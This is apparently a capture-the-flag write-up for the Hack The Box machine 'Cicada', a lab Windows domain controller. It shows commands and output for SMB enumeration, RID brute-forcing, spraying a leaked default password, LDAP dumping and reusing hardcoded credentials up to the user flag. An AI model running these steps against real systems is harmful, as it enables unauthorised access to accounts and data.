Cicada

Season 6 Machine

Nmap results:

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ nmap -sV -Pn 10.129.179.243
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 22:53 CEST
Nmap scan report for 10.129.179.243
Host is up (0.027s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-01 03:53:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.22 seconds

SMB

Let's look at SMB first.

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ smbclient -L //10.129.179.243 -N

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk
        HR              Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share

The HR share is the only one we seem to be able to access as anonymous.

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ smbclient //10.129.179.243/hr -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:29:09 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 19:31:48 2024

Let's download that file and check it out.

smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)

This is the content of that file:

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Ok so we got a password (Cicada$M6Corpb*@Lp#nZp!8) but not a username.

I experimented a bit with crackmapexec which is a really neat tool and with this command:

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u 'guest' -p '' --rid-brute

Results:

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u 'guest' -p '' --rid-brute
SMB         10.129.179.243  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.179.243  445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.129.179.243  445    CICADA-DC        [+] Brute forcing RIDs
SMB         10.129.179.243  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.179.243  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.179.243  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.179.243  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.179.243  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.179.243  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.179.243  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.179.243  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.179.243  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.179.243  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.179.243  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.179.243  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.179.243  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.179.243  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.179.243  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

Now we have some users that we could try our previously obtained password with.

I had to try two before hitting the right one.

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u john.smoulder -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB         10.129.179.243  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.179.243  445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u sarah.dantelia -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB         10.129.179.243  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.179.243  445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB         10.129.179.243  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.179.243  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

Looks like michael.wrightson didn't change his default password and he has broader permissions than our unauthenticated guest earlier:

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB         10.129.179.243  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.179.243  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.129.179.243  445    CICADA-DC        [+] Enumerated shares
SMB         10.129.179.243  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.179.243  445    CICADA-DC        -----           -----------     ------
SMB         10.129.179.243  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.179.243  445    CICADA-DC        C$                              Default share
SMB         10.129.179.243  445    CICADA-DC        DEV
SMB         10.129.179.243  445    CICADA-DC        HR              READ
SMB         10.129.179.243  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.179.243  445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.129.179.243  445    CICADA-DC        SYSVOL          READ            Logon server share

I didn't find anything useful using Michael's credentials however..

Let's run ldapdomaindump

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ ldapdomaindump ldap://10.129.173.228 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

We found credentials for another user here. 'david.orelious'. And he has access to the 'DEV' share.

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ smbclient //10.129.173.228/DEV -U 'david.orelious'
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:31:39 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 19:28:22 2024

'Backup_script.ps1' contains some hardcoded credentials for Emily Oscars

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Emily is a member of the 'Remote Management Users' and 'Backup Operators' groups and has access to the C$ share.

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ smbclient //10.129.173.228/C$ -U 'emily.oscars'
Password for [WORKGROUP\emily.oscars]:
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Thu Mar 14 14:24:03 2024
  $WinREAgent                        DH        0  Mon Sep 23 18:16:49 2024
  Documents and Settings          DHSrn        0  Thu Mar 14 20:40:47 2024
  DumpStack.log.tmp                 AHS    12288  Tue Oct  8 03:49:38 2024
  pagefile.sys                      AHS 738197504  Tue Oct  8 03:49:38 2024
  PerfLogs                            D        0  Thu Aug 22 20:45:54 2024
  Program Files                      DR        0  Thu Aug 29 21:32:50 2024
  Program Files (x86)                 D        0  Sat May  8 11:40:21 2021
  ProgramData                       DHn        0  Fri Aug 30 19:32:07 2024
  Recovery                         DHSn        0  Thu Mar 14 20:41:18 2024
  Shares                              D        0  Thu Mar 14 13:21:29 2024
  System Volume Information         DHS        0  Thu Mar 14 12:18:00 2024
  Users                              DR        0  Mon Aug 26 22:11:25 2024
  Windows                             D        0  Mon Sep 23 18:35:40 2024

                4168447 blocks of size 4096. 336378 blocks available

After some digging I found the user flag here: 

smb: \Users\emily.oscars.CICADA\Desktop\> ls
  .                                  DR        0  Wed Aug 28 19:32:18 2024
  ..                                  D        0  Thu Aug 22 23:22:13 2024
  user.txt                           AR       34  Tue Oct  8 03:50:37 2024

PreviousHack The Box MachinesNextChemistry

Last updated